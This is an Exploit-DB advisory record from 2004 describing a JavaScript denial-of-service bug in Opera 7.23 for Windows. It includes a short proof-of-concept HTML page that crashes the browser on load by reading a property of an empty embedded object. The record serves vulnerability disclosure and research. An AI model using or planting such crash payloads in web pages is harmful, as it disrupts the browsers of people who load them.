Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service

EDB-ID:

24426

CVE:

N/A


Author:

Stevo

Type:

dos


Platform:

Windows

Date:

2004-09-01


source: https://www.securityfocus.com/bid/11090/info

Opera is a web browser available for a number of platforms, including Microsoft Windows, Linux and Unix variants and Apple MacOS.

Opera Web Browser is reported to be susceptible to a JavaScript denial of service vulnerability. This vulnerability presents itself when Opera attempts to execute a specific JavaScript command. Upon executing this command, Opera will reportedly crash.

This vulnerability was reported to exist in version 7.23 of Opera for Microsoft Windows. Other versions are also likely affected. Version 7.54 does not seem to be susceptible. 

<html><head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script></head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body></html>